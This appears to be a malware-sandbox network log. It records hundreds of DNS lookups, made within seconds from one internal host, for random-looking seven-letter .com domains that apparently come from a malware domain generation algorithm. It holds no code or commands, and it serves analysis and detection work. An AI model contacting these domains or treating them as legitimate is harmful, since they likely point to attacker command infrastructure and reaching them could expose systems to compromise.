                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.975895882 CET192.168.2.61.1.1.10x8855Standard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.978198051 CET192.168.2.61.1.1.10x994dStandard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.981997013 CET192.168.2.61.1.1.10xe56Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.982465029 CET192.168.2.61.1.1.10xf3d1Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.982949018 CET192.168.2.61.1.1.10xf8f2Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.983145952 CET192.168.2.61.1.1.10xcd7bStandard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.983910084 CET192.168.2.61.1.1.10x8baStandard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.984385967 CET192.168.2.61.1.1.10x607Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.989803076 CET192.168.2.61.1.1.10xa7f1Standard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.990391970 CET192.168.2.61.1.1.10xa23eStandard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.991166115 CET192.168.2.61.1.1.10x94c2Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.991806984 CET192.168.2.61.1.1.10xfe29Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.994172096 CET192.168.2.61.1.1.10x7ffcStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.996511936 CET192.168.2.61.1.1.10x461eStandard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.996697903 CET192.168.2.61.1.1.10xcf05Standard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.996926069 CET192.168.2.61.1.1.10xc6bdStandard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.234852076 CET192.168.2.61.1.1.10x613dStandard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.235184908 CET192.168.2.61.1.1.10x1206Standard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.236793995 CET192.168.2.61.1.1.10x6449Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.238014936 CET192.168.2.61.1.1.10x676fStandard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.239157915 CET192.168.2.61.1.1.10x4ce7Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.244808912 CET192.168.2.61.1.1.10xdf48Standard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.248373032 CET192.168.2.61.1.1.10x1edStandard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.248509884 CET192.168.2.61.1.1.10xe7c3Standard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.250144005 CET192.168.2.61.1.1.10x2712Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.253635883 CET192.168.2.61.1.1.10xc8e8Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.254096985 CET192.168.2.61.1.1.10xb192Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.266858101 CET192.168.2.61.1.1.10x21bfStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.267354965 CET192.168.2.61.1.1.10xee57Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.267582893 CET192.168.2.61.1.1.10x1daeStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.267913103 CET192.168.2.61.1.1.10x481cStandard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.277581930 CET192.168.2.61.1.1.10x9f4dStandard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.281344891 CET192.168.2.61.1.1.10x4501Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.284965992 CET192.168.2.61.1.1.10x1613Standard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.285099983 CET192.168.2.61.1.1.10x59edStandard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.288749933 CET192.168.2.61.1.1.10x92ffStandard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.289174080 CET192.168.2.61.1.1.10x6c3eStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.289712906 CET192.168.2.61.1.1.10x878fStandard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.291265965 CET192.168.2.61.1.1.10xe646Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.291565895 CET192.168.2.61.1.1.10x42f4Standard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.295891047 CET192.168.2.61.1.1.10x5cd1Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.296145916 CET192.168.2.61.1.1.10x7d53Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.296442032 CET192.168.2.61.1.1.10x99c9Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.299664021 CET192.168.2.61.1.1.10x3361Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.299783945 CET192.168.2.61.1.1.10x362bStandard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.300323963 CET192.168.2.61.1.1.10x21b6Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.300569057 CET192.168.2.61.1.1.10xebd9Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.300992012 CET192.168.2.61.1.1.10xc371Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.301028013 CET192.168.2.61.1.1.10xa9e1Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.304755926 CET192.168.2.61.1.1.10x3612Standard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.305510998 CET192.168.2.61.1.1.10x7bc9Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.306241035 CET192.168.2.61.1.1.10xd5e6Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.310504913 CET192.168.2.61.1.1.10x441cStandard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311197042 CET192.168.2.61.1.1.10x86abStandard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311589956 CET192.168.2.61.1.1.10x843cStandard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311762094 CET192.168.2.61.1.1.10xb323Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311913967 CET192.168.2.61.1.1.10x1392Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.313069105 CET192.168.2.61.1.1.10xd480Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.317311049 CET192.168.2.61.1.1.10x614fStandard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.318208933 CET192.168.2.61.1.1.10x606fStandard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.318696976 CET192.168.2.61.1.1.10xdf7bStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.319479942 CET192.168.2.61.1.1.10xa703Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.320086956 CET192.168.2.61.1.1.10xcad6Standard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.320868015 CET192.168.2.61.1.1.10x9e04Standard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.328665018 CET192.168.2.61.1.1.10x8e4fStandard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.330409050 CET192.168.2.61.1.1.10xa488Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.331448078 CET192.168.2.61.1.1.10x9d3eStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.331665993 CET192.168.2.61.1.1.10x3b74Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.331839085 CET192.168.2.61.1.1.10xb220Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.332329035 CET192.168.2.61.1.1.10x83d4Standard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.332379103 CET192.168.2.61.1.1.10xa5a9Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.350027084 CET192.168.2.61.1.1.10x8022Standard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.355459929 CET192.168.2.61.1.1.10x2efcStandard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.400681973 CET192.168.2.61.1.1.10x90b7Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.400831938 CET192.168.2.61.1.1.10x698bStandard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.403724909 CET192.168.2.61.1.1.10xa5acStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.413099051 CET192.168.2.61.1.1.10x6a4dStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.413477898 CET192.168.2.61.1.1.10x4686Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.454965115 CET192.168.2.61.1.1.10xa528Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.455725908 CET192.168.2.61.1.1.10x8c96Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.727524996 CET192.168.2.61.1.1.10xb3b0Standard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.728529930 CET192.168.2.61.1.1.10x7abdStandard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.729106903 CET192.168.2.61.1.1.10xdb4cStandard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.730252981 CET192.168.2.61.1.1.10x6102Standard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.731545925 CET192.168.2.61.1.1.10xf8baStandard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.738930941 CET192.168.2.61.1.1.10x5e5bStandard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.739038944 CET192.168.2.61.1.1.10xffaeStandard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.741543055 CET192.168.2.61.1.1.10x12f9Standard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.743567944 CET192.168.2.61.1.1.10xf205Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.746927977 CET192.168.2.61.1.1.10x4957Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.748184919 CET192.168.2.61.1.1.10xe0e7Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.748862982 CET192.168.2.61.1.1.10x3f8cStandard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.748862982 CET192.168.2.61.1.1.10xe292Standard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.749516964 CET192.168.2.61.1.1.10x1c89Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.749660015 CET192.168.2.61.1.1.10xb2d6Standard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.750348091 CET192.168.2.61.1.1.10xc939Standard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.750973940 CET192.168.2.61.1.1.10xa985Standard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.753957033 CET192.168.2.61.1.1.10xb030Standard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.757091999 CET192.168.2.61.1.1.10xba90Standard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.757333994 CET192.168.2.61.1.1.10x9eceStandard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.759217024 CET192.168.2.61.1.1.10x27a4Standard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.764903069 CET192.168.2.61.1.1.10x47a5Standard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.765455008 CET192.168.2.61.1.1.10xc27dStandard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.766144991 CET192.168.2.61.1.1.10x487Standard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.766367912 CET192.168.2.61.1.1.10xc41Standard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.766619921 CET192.168.2.61.1.1.10x4a7bStandard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.768549919 CET192.168.2.61.1.1.10x7d01Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.768728971 CET192.168.2.61.1.1.10x9d0cStandard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.769939899 CET192.168.2.61.1.1.10x8d5aStandard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.770915985 CET192.168.2.61.1.1.10xa49cStandard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.772046089 CET192.168.2.61.1.1.10xf161Standard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.773252010 CET192.168.2.61.1.1.10xabStandard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.791038990 CET192.168.2.61.1.1.10x1eccStandard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.802087069 CET192.168.2.61.1.1.10x3e2eStandard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.804406881 CET192.168.2.61.1.1.10x2fb0Standard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.906793118 CET192.168.2.61.1.1.10xa529Standard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.910981894 CET192.168.2.61.1.1.10xceb1Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.911070108 CET192.168.2.61.1.1.10xdf74Standard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.923065901 CET192.168.2.61.1.1.10xa331Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.923290014 CET192.168.2.61.1.1.10x56cfStandard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.923428059 CET192.168.2.61.1.1.10x4ab8Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.923680067 CET192.168.2.61.1.1.10xdc9Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.924007893 CET192.168.2.61.1.1.10x6d03Standard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.924186945 CET192.168.2.61.1.1.10x7ae5Standard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.929876089 CET192.168.2.61.1.1.10x16fcStandard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.930363894 CET192.168.2.61.1.1.10xeb32Standard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.931302071 CET192.168.2.61.1.1.10x956Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.931421041 CET192.168.2.61.1.1.10xf8cbStandard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.932651997 CET192.168.2.61.1.1.10x6d79Standard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.932956934 CET192.168.2.61.1.1.10x49a8Standard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.932956934 CET192.168.2.61.1.1.10x4792Standard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.934662104 CET192.168.2.61.1.1.10xc3d2Standard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.935009956 CET192.168.2.61.1.1.10xe6eeStandard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.936816931 CET192.168.2.61.1.1.10x6d10Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.936939001 CET192.168.2.61.1.1.10xf68eStandard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.937114000 CET192.168.2.61.1.1.10x444fStandard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.937792063 CET192.168.2.61.1.1.10x7f5aStandard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.938445091 CET192.168.2.61.1.1.10x8386Standard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.939040899 CET192.168.2.61.1.1.10x1c4aStandard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.939616919 CET192.168.2.61.1.1.10xccfcStandard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.940352917 CET192.168.2.61.1.1.10xfd69Standard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.941092968 CET192.168.2.61.1.1.10x65e7Standard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.942464113 CET192.168.2.61.1.1.10x2919Standard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.945297003 CET192.168.2.61.1.1.10xaa82Standard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.091742039 CET192.168.2.61.1.1.10xf27Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.093242884 CET192.168.2.61.1.1.10x6e82Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.097095013 CET192.168.2.61.1.1.10xcb8bStandard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.098541021 CET192.168.2.61.1.1.10x1c4dStandard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.099153042 CET192.168.2.61.1.1.10x3fbcStandard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.099833012 CET192.168.2.61.1.1.10xa1ddStandard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.116739035 CET192.168.2.61.1.1.10xc2c6Standard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.117013931 CET192.168.2.61.1.1.10xbb9Standard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.131731033 CET192.168.2.61.1.1.10xa7efStandard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.132460117 CET192.168.2.61.1.1.10x5283Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.140542984 CET192.168.2.61.1.1.10x7b43Standard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.140784025 CET192.168.2.61.1.1.10x1527Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.141047955 CET192.168.2.61.1.1.10x9f4fStandard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.141236067 CET192.168.2.61.1.1.10x7faStandard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.154117107 CET192.168.2.61.1.1.10xc5fdStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.159502029 CET192.168.2.61.1.1.10xa6bStandard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.160288095 CET192.168.2.61.1.1.10x9d89Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.160830975 CET192.168.2.61.1.1.10xb6f6Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.161756039 CET192.168.2.61.1.1.10xd308Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.162058115 CET192.168.2.61.1.1.10xf0a5Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.165249109 CET192.168.2.61.1.1.10x3925Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.165657043 CET192.168.2.61.1.1.10x7a70Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.166671991 CET192.168.2.61.1.1.10x7c6dStandard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.166709900 CET192.168.2.61.1.1.10x2f1cStandard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.166915894 CET192.168.2.61.1.1.10x4118Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.168169022 CET192.168.2.61.1.1.10x58bfStandard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.169223070 CET192.168.2.61.1.1.10x7126Standard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.169935942 CET192.168.2.61.1.1.10xa5a3Standard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.182012081 CET192.168.2.61.1.1.10xe39bStandard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.183120012 CET192.168.2.61.1.1.10xf3fStandard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.183568954 CET192.168.2.61.1.1.10x486Standard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187236071 CET192.168.2.61.1.1.10x248Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187482119 CET192.168.2.61.1.1.10x6f2aStandard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187705040 CET192.168.2.61.1.1.10x5f69Standard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.187939882 CET192.168.2.61.1.1.10xd213Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.197444916 CET192.168.2.61.1.1.10xc4b3Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.197762012 CET192.168.2.61.1.1.10xfc64Standard query (0)gacyroh.comA (IP address)IN (0x0001)false
